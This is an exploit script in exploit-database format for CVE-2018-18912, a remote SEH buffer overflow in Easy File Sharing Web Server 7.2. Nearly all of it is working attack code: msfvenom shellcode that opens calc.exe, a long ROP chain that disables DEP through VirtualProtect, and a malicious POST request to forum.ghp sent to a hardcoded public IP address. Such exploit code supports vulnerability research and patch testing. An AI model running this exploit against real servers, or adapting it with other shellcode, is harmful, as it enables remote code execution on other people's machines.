CVE-2018-18912.py

# Exploit Title: Easy File Sharing Web Server 7.2 - 'author' Remote Buffer Overflow (SEH)
# Date: November 5, 2018
# Exploit Author: Kristijan Antic
# Vendor Homepage: http://www.sharing-file.com/
# Software Link: http://www.sharing-file.com/efssetup.exe
# Version: 7.2
# Tested on: Windows 10.0.17134 x64
# CVE : CVE-2018-18912

# 1. Description: An issue was discovered in Easy File Sharing (EFS) Web Server 7.2,
# A stack-based buffer overflow vulnerability occurs when an authenticated user sends
# a malicious POST request to forum.ghp upon creating a new topic in
# the forums, which allows remote attackers to execute arbitrary code.


# 2. Proof of Concept

import socket
import struct

HOST = '81.82.253.190'
PORT = 81

def p32(v):
	return struct.pack("<L", v)

def send_malformed_buffer(data):
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((HOST, PORT))
	s.send(data)
	s.close()


#msfvenom.bat -p windows/exec cmd=calc.exe -b '\xff\x2c\x00\x7e\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e\x3d\x25\x2b\x26' -v shellcode -f python

shellcode =  ""
shellcode += "\x6a\x31\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73"
shellcode += "\x13\x90\xaa\xb9\xe4\x83\xeb\xfc\xe2\xf4\x6c\x42"
shellcode += "\x3b\xe4\x90\xaa\xd9\x6d\x75\x9b\x79\x80\x1b\xfa"
shellcode += "\x89\x6f\xc2\xa6\x32\xb6\x84\x21\xcb\xcc\x9f\x1d"
shellcode += "\xf3\xc2\xa1\x55\x15\xd8\xf1\xd6\xbb\xc8\xb0\x6b"
shellcode += "\x76\xe9\x91\x6d\x5b\x16\xc2\xfd\x32\xb6\x80\x21"
shellcode += "\xf3\xd8\x1b\xe6\xa8\x9c\x73\xe2\xb8\x35\xc1\x21"
shellcode += "\xe0\xc4\x91\x79\x32\xad\x88\x49\x83\xad\x1b\x9e"
shellcode += "\x32\xe5\x46\x9b\x46\x48\x51\x65\xb4\xe5\x57\x92"
shellcode += "\x59\x91\x66\xa9\xc4\x1c\xab\xd7\x9d\x91\x74\xf2"
shellcode += "\x32\xbc\xb4\xab\x6a\x82\x1b\xa6\xf2\x6f\xc8\xb6"
shellcode += "\xb8\x37\x1b\xae\x32\xe5\x40\x23\xfd\xc0\xb4\xf1"
shellcode += "\xe2\x85\xc9\xf0\xe8\x1b\x70\xf5\xe6\xbe\x1b\xb8"
shellcode += "\x52\x69\xcd\xc0\xb8\x69\x15\x18\xb9\xe4\x90\xfa"
shellcode += "\xd1\xd5\x1b\xc5\x3e\x1b\x45\x11\x49\x51\x32\xfc"
shellcode += "\xd1\x42\x05\x17\x24\x1b\x45\x96\xbf\x98\x9a\x2a"
shellcode += "\x42\x04\xe5\xaf\x02\xa3\x83\xd8\xd6\x8e\x90\xf9"
shellcode += "\x46\x31\xf3\xcb\xd5\x87\xbe\xcf\xc1\x81\x90\xaa"
shellcode += "\xb9\xe4"


# ---====GADGETS====---
ropnop = 0x1001a858
pop_eax_retn = 0x10015442
stack_pivot_addr = 0x10022869
pop_esi_retn = 0x1001c8e4
pop_ebx_retn = 0x10012F3C
pop_ecx_retn = 0x1001FC4C
neg_eax_retn = 0x100231cd
add_ebx_eax = 0x1001DA09 
pop_edi_retn = 0x1001A648
xor_edx_edx = 0x10022C4C
inc_edx = 0x61c059a0
pop_ebp_retn = 0x1001add7
push_esp_retn = 0x61c24169
pushad_retn = 0x100240c2


ropchain = ''

buff = 'A' * 64
buff += 'BBBB' #nseh
buff += struct.pack("<L", stack_pivot_addr) #handler
buff += 'F' * 2348

ropchain += p32(pop_eax_retn)
ropchain += p32(0x61c832d0) #need to deref
ropchain += p32(0x1002248c) # MOV EAX,DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]
ropchain += p32(0x61c18d81)
ropchain += p32(0x1001d626)
ropchain += p32(0x10021a3e)

#EBP = ReturnTo() rop gadget to push esp ret
ropchain += p32(pop_ebp_retn)
ropchain += p32(push_esp_retn)

#EDX = NewProtect(0x40)
ropchain += p32(xor_edx_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)

#ECX = lpOldProtect (ptr to writable address address)
ropchain += p32(pop_ecx_retn)
ropchain += p32(0x61c730ad)

#EBX = dwSize()
ropchain += p32(pop_eax_retn)
ropchain += p32(0xFFFFFFFE)
ropchain += p32(neg_eax_retn)
ropchain += p32(add_ebx_eax)

#EDI = ROP NOP
ropchain += p32(pop_edi_retn)
ropchain += p32(ropnop)

#EAX = NOP (0x90909090)
ropchain += p32(pop_eax_retn)
ropchain += p32(0x10027010) #will inc one byte at this addr
ropchain += p32(pop_eax_retn)
ropchain += p32(0x90909090)

#PUSAH
ropchain += p32(pushad_retn)
ropchain += '\x90' * 4
ropchain += shellcode

buff += ropchain

request = ''
request += "POST /forum.ghp?forumid=1 HTTP/1.1\r\n"
request += "Host: 192.168.184.1\r\n"
request += "Content-Type: application/x-www-form-urlencoded\r\n"
request += "User-Agent: Mozilla/5.0\r\n"
request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\n"
request += "Accept-Language: en-US,en;q=0.9\r\n"
request += "Cookie: UserID=hacker; PassWD=hacker; frmUserName=; frmUserPass=; rememberPass=202%2C197%2C208%2C215%2C201; SESSIONID=14677\r\n"
request += "Connection: close\r\n"
request += "\r\n"
request += "author="+buff+"&passwd=hacker&title=bbbb&content=ffff&Submit=Submit\r\n"

send_malformed_buffer(request)